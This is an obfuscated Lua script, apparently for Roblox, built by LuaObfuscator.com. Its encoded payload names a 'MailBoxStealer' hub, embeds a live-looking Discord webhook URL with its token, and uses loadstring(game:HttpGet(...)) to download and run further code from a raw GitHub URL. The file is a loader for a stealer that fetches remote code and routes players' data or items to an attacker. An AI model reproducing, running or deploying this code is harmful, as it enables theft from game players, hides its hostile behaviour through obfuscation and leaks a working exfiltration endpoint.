--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v74=0;while true do if (v74==0) then v19=v0(v3(v30,1,1));return "";end end else local v75=v2(v0(v30,16));if v19 then local v93=v5(v75,v19);v19=nil;return v93;else return v75;end end end);local function v20(v31,v32,v33)if v33 then local v76=(v31/((2 + 0)^(v32-((791 -(639 + 151)) + 0))))%(((128 -(71 + 56)) + 1)^(((v33-(1 + 0)) -(v32-(1 + 0))) + (2 -(47 -(40 + 6))))) ;return v76-(v76%(1 + 0)) ;else local v77=((5005 -3397) -(211 + 1036 + 359))^(v32-(1 + 0)) ;return (((v31%(v77 + v77))>=v77) and (1 -0)) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + (0 -0) ;local v36;local v37;while true do if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (185 -(145 + 38)) );v18=v18 + (741 -(357 + 382)) ;v35=(1212 -(505 + 706)) -0 ;end if ((1 -0)==v35) then return (v37 * (105 + 151)) + v36 ;end end end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(391 -(212 + 179))) then v39,v40,v41,v42=v1(v16,v18,v18 + 1 + 1 + 1 );v18=v18 + 4 ;v38=451 -(159 + 291) ;end if (v38==(1 + 0)) then return (v42 * (54712392 -37935176)) + (v41 * (125714 -60178)) + (v40 * ((2379 -(1578 + 57)) -488)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,1669 -((2443 -(596 + 789)) + 610) ,2 + 14 + 4 ) * ((2 + 0)^(1374 -(629 + 713)))) + v43 ;local v47=v20(v44,50 -(67 -38) ,48 -17 );local v48=((v20(v44,18 + 14 )==(471 -(418 + 8 + 11 + 33))) and  -(1 + 0)) or (1 + 0 + 0) ;if (v47==0) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=1830 -(881 + 948) ;v45=796 -(718 + 78) ;end elseif (v47==(4664 -2617)) then return ((v46==(0 + 0 + 0)) and (v48 * ((3 -2)/(0 + 0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(2577 -(1328 + 226)) ) * (v45 + (v46/(((3 + 1) -2)^((116 -(44 + 33)) + 13)))) ;end local function v25(v49)local v50;if  not v49 then local v78=0 + (763 -(531 + 232)) ;while true do if (v78==(0 -0)) then v49=v23();if (v49==(1573 -(1206 + 367))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=1792 -(1758 + 33) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1885 -(1772 + 111))) then v57=nil;v58=nil;v52=7 -4 ;end if (v52~=3) then else v59=nil;v60=nil;v52=701 -(452 + 245) ;end if (v52==1) then v55=nil;v56=nil;v52=2 + 0 ;end if (v52~=0) then else v53=0 + 0 ;v54=nil;v52=1;end if ((4 + 0)==v52) then while true do if (v53==(1 -0)) then v56=nil;v57=nil;v53=2;end if (v53==2) then v58=nil;v59=nil;v53=3;end if (v53~=3) then else v60=nil;while true do if (v54==(285 -(210 + 75))) then local v101=0;local v102;while true do if (0~=v101) then else v102=0 -0 ;while true do if (v102==0) then v55={};v56={};v102=702 -(676 + 25) ;end if (v102==(1 + 0)) then v57={};v58={v55,v56,nil,v57};v102=2;end if (v102==2) then v54=1;break;end end break;end end end if (1~=v54) then else local v103=0 -0 ;while true do if (v103==1) then for v124=3 -2 ,v59 do local v125=0;local v126;local v127;local v128;local v129;local v130;while true do if (v125==0) then v126=0 -0 ;v127=nil;v125=1;end if (v125==2) then v130=nil;while true do if (v126~=(0 + 0)) then else local v145=0 + 0 ;while true do if (v145==(1 + 0)) then v126=1793 -(171 + 1621) ;break;end if (v145==(1348 -(234 + 1114))) then v127=0 + 0 ;v128=nil;v145=1;end end end if (v126==1) then v129=nil;v130=nil;v126=2;end if (v126==(1027 -(28 + 997))) then while true do if (v127~=(1239 -(1207 + 32))) then else local v148=0;local v149;while true do if (v148==(1533 -(1268 + 265))) then v149=0 + 0 ;while true do if (v149==(0 + 0)) then v128=422 -(301 + 121) ;v129=nil;v149=1055 -(458 + 596) ;end if (v149==1) then v127=1659 -(995 + 663) ;break;end end break;end end end if (v127==1) then v130=nil;while true do if (v128==0) then local v159=0;local v160;while true do if (v159~=0) then else v160=694 -(79 + 615) ;while true do if (v160~=0) then else v129=v21();v130=nil;v160=848 -(290 + 557) ;end if (v160~=(1 + 0)) then else v128=1 + 0 ;break;end end break;end end end if (v128==(599 -(563 + 35))) then if (v129==1) then v130=v21()~=0 ;elseif (v129==(6 -4)) then v130=v24();elseif (v129==3) then v130=v25();end v60[v124]=v130;break;end end break;end end break;end end break;end if (1~=v125) then else v128=nil;v129=nil;v125=295 -(72 + 221) ;end end end v58[3 + 0 ]=v21();v103=2;end if (v103~=2) then else v54=4 -2 ;break;end if (v103~=(0 -0)) then else v59=v23();v60={};v103=1 + 0 ;end end end if (v54==(1 + 1)) then local v104=0 -0 ;local v105;while true do if (v104~=0) then else v105=0;while true do local v131=0 -0 ;while true do if (v131~=(1560 -(448 + 1112))) then else if (v105==(1335 -(153 + 1181))) then local v139=0 -0 ;while true do if (0==v139) then for v150=1190 -(637 + 552) ,v23() do v57[v150]=v23();end return v58;end end end if (v105~=(0 -0)) then else local v140=646 -(133 + 513) ;while true do if (v140==0) then for v152=471 -(70 + 400) ,v23() do local v153=0 -0 ;local v154;while true do if (v153==(0 -0)) then v154=v21();if (v20(v154,1186 -(579 + 606) ,1442 -(935 + 506) )~=(0 + 0)) then else local v162=0 -0 ;local v163;local v164;local v165;local v166;while true do if (v162~=(1 + 0)) then else local v167=0 -0 ;local v168;while true do if (v167==0) then v168=0;while true do if (v168==(1 -0)) then v162=2;break;end if (v168~=(0 + 0)) then else local v181=0 -0 ;while true do if (v181~=(1903 -(1646 + 256))) then else v168=1 + 0 ;break;end if (v181==(804 -(61 + 743))) then v165=nil;v166=nil;v181=1;end end end end break;end end end if (v162==2) then while true do if (v163~=3) then else if (v20(v165,1659 -(117 + 1539) ,3)==(1 -0)) then v166[14 -10 ]=v60[v166[5 -1 ]];end v55[v152]=v166;break;end if ((1604 -(264 + 1340))~=v163) then else local v171=0;local v172;local v173;while true do if (v171==0) then v172=0 + 0 ;v173=nil;v171=1;end if (v171~=1) then else while true do if (v172==(0 -0)) then v173=0;while true do if (v173~=0) then else v164=v20(v154,2 -0 ,3);v165=v20(v154,4,6);v173=1 + 0 ;end if (v173~=1) then else v163=1 + 0 ;break;end end break;end end break;end end end if (v163==1) then local v174=0 -0 ;local v175;local v176;while true do if (v174==1) then while true do if (v175==(1058 -(496 + 562))) then v176=0;while true do if (v176~=0) then else v166={v22(),v22(),nil,nil};if (v164==(0 -0)) then local v184=0;local v185;while true do if (v184==0) then v185=0;while true do if (v185==0) then v166[3]=v22();v166[3 + 1 ]=v22();break;end end break;end end elseif (v164==(74 -(59 + 14))) then v166[3]=v23();elseif (v164==(7 -5)) then v166[3]=v23() -((647 -(296 + 349))^16) ;elseif (v164==(799 -(680 + 116))) then local v191=0 + 0 ;local v192;local v193;while true do if (v191==(866 -(76 + 789))) then while true do if (v192==0) then v193=0;while true do if (v193==0) then v166[478 -(282 + 193) ]=v23() -(2^16) ;v166[4]=v22();break;end end break;end end break;end if (v191==0) then v192=0 -0 ;v193=nil;v191=1;end end end v176=1;end if (1==v176) then v163=2;break;end end break;end end break;end if (v174~=0) then else v175=0 + 0 ;v176=nil;v174=1;end end end if (v163~=(2 + 0)) then else local v177=1674 -(1349 + 325) ;local v178;while true do if (v177~=(0 -0)) then else v178=781 -(8 + 773) ;while true do if (v178~=1) then else v163=7 -4 ;break;end if (v178==0) then local v182=0 + 0 ;local v183;while true do if (v182==(0 + 0)) then v183=0;while true do if (v183==(1 + 0)) then v178=1;break;end if (v183==(0 + 0)) then local v186=0;while true do if (v186==(1 + 0)) then v183=1 + 0 ;break;end if (v186==0) then if (v20(v165,451 -(47 + 403) ,4 -3 )~=(1 + 0)) then else v166[2]=v60[v166[1 + 1 ]];end if (v20(v165,2 + 0 ,2)~=1) then else v166[1615 -(310 + 1302) ]=v60[v166[3]];end v186=1836 -(1460 + 375) ;end end end end break;end end end end break;end end end end break;end if ((0 + 0)==v162) then local v169=0;while true do if (v169==0) then v163=0 -0 ;v164=nil;v169=1;end if (v169==(948 -(639 + 308))) then v162=1962 -(440 + 1521) ;break;end end end end end break;end end end for v155=1,v23() do v56[v155-1 ]=v28();end v140=1;end if (v140~=1) then else v105=630 -(408 + 221) ;break;end end end break;end end end break;end end end end break;end if (v53~=0) then else local v98=0 -0 ;while true do if (v98~=(198 -(64 + 134))) then else v54=0;v55=nil;v98=1;end if (v98==1) then v53=1;break;end end end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=1;local v70= -1;local v71={...};local v72=v12("#",...) -1 ;local function v73()local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83={};local v84={};local v85={};for v89=0 -0 ,v72 do if (((2740 -(84 + 21))>=(1272 -405)) and (v89>=v81)) then v83[v89-v81 ]=v71[v89 + (1 -0) ];else v85[v89]=v71[v89 + (1 -0) ];end end local v86=(v72-v81) + 1 + 0 ;local v87;local v88;while true do local v90=0;while true do if ((v90==(0 + 0)) or (((5205 + 155) -((1650 -695) + 332))<2274)) then v87=v79[v69];v88=v87[3 -(5 -3) ];v90=3 -2 ;end if (((3890 -1887)<=(6540 -(1439 + 244))) and (v90==(2 -1))) then if ((v88<=(11 -(283 -(123 + 152)))) or (77>=(3550 -(219 + 59)))) then if (((4575 -(16 + 557))>=2694) and (v88<=(1 + 0))) then if ((v88>((0 + 0) -0)) or ((560 -(46 + 92))>(4755 -(432 + 318)))) then v85[v87[2]]();else do return;end end elseif (((5387 -3897)<=4703) and (v88==(2 + 0))) then local v107=1634 -(1416 + 218) ;local v108;local v109;local v110;local v111;while true do if ((1629<=(3584 -(446 + 70))) and (v107==((354 + 848) -(391 + 811)))) then v108=v87[1 + 1 + 0 ];v109,v110=v82(v85[v108](v13(v85,v108 + (504 -(389 + (322 -208))) ,v87[(3 + 6) -6 ])));v107=(4228 -2805) -(705 + 717) ;end if ((v107==(1 + 1)) or (941<=(2180 -(798 + (1638 -702))))) then for v136=v108,v70 do local v137=0 + 0 ;local v138;while true do if (((589 -392)==((88 -54) + (1141 -(730 + 248)))) and (v137==(0 -0))) then v138=0 + 0 ;while true do if (((52 + 366 + 2021)<=(2775 + 1584)) and (v138==((0 -0) + 0))) then v111=v111 + (714 -(193 + 520)) + 0 ;v85[v136]=v109[v111];break;end end break;end end end break;end if ((v107==(1 + 0 + 0)) or (((1887 + 1134) -(431 + 936))>(4184 + 177))) then local v133=0 + 0 ;while true do if ((0==v133) or ((1018 + 2954)<=(4115 -941))) then v70=(v110 + v108) -((18 + 304) -(195 + 126)) ;v111=(1246 -(473 + 773)) + 0 + 0 ;v133=(1925 -(653 + 927)) -(121 + 223) ;end if (((4365 -2249)<(5136 -(709 + 424))) and (v133==(600 -(215 + 384)))) then v107=2;break;end end end end else local v112=0;local v113;while true do if (((1484 + 2144)==(3776 -(134 + (1158 -(278 + 866))))) and (v112==(1075 -(511 + 564)))) then v113=v87[(2659 -1927) -(410 + 320) ];v85[v113]=v85[v113](v13(v85,v113 + (33 -(17 + 15)) + 0 ,v70));break;end end end elseif ((((1811 -(143 + 274)) -(239 + 16))>=(121 + 453)) and (v88<=(1985 -(310 + 1670)))) then if (((1767 -(18 + 863))<=(5120 -((937 -(229 + 352)) + (1810 -(782 + 854))))) and (v88==(1 + 3))) then v85[v87[2 -0 ]]=v63[v87[2 + 1 ]];else v85[v87[74 -(69 + 3) ]][v87[3 + 0 ]]=v87[4];end elseif (((8991 -5255)>(772 -493)) and (v88==(28 -(77 -55)))) then local v118=140 -(24 + 116) ;local v119;local v120;local v121;while true do if ((v118==(1343 -(1129 + 214))) or ((689 + 493 + 1607)<(2229 -(153 + 1578)))) then v119=645 -(386 + 259) ;v120=nil;v118=(34 + 172) -(42 + 163) ;end if ((v118==(1 + 0)) or ((2118 -(666 + 337))>1395)) then v121=nil;while true do if ((v119==(0 -0)) or ((4319 + 265)<=4436)) then local v141=0 + 0 ;while true do if ((((4068 + 1333) -(575 + 308))==(368 + 4150)) and (v141==(0 + 0))) then v120=v87[1 + 1 ];v121=v85[v87[1 + 1 + 1 ]];v141=1 + 0 ;end if ((v141==(1 -0)) or ((3134 -(150 + 539))==(4078 -2701))) then v119=1;break;end end end if ((v119==((5 -1) -3)) or ((691 + 1452)>(5013 -(939 + 388)))) then v85[v120 + 1 + 0 ]=v121;v85[v120]=v121[v87[1 + (1733 -(714 + 1016)) ]];break;end end break;end end else v85[v87[1523 -(180 + 1341) ]]=v87[203 -(114 + 86) ];end v69=v69 + (1988 -(783 + 1204)) ;break;end end end end A,B=v27(v11(v73));if  not A[1] then local v91=0;local v92;while true do if (v91==0) then v92=v61[4][v69] or "?" ;error("Script error at ["   .. v92   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D6503143O004A61636B546865432O6F6C447564655O3703073O004875624E616D65030E3O004D61696C426F78537465616C6572030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130312O3233392O313038323935303733372F383459492D352D5F6E6762456C78734965716E702O744E4D6A394B38666E6474354630357674684B547A3036484E51346277436D4C38674973466858706D3952445A7063030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000E3O0012043O00013O0030053O000200030012043O00013O0030053O000400050012043O00013O0030053O000600070012043O00083O001204000100093O00200600010001000A0012070003000B4O0002000100034O00035O00022O00013O000100016O00017O000E3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
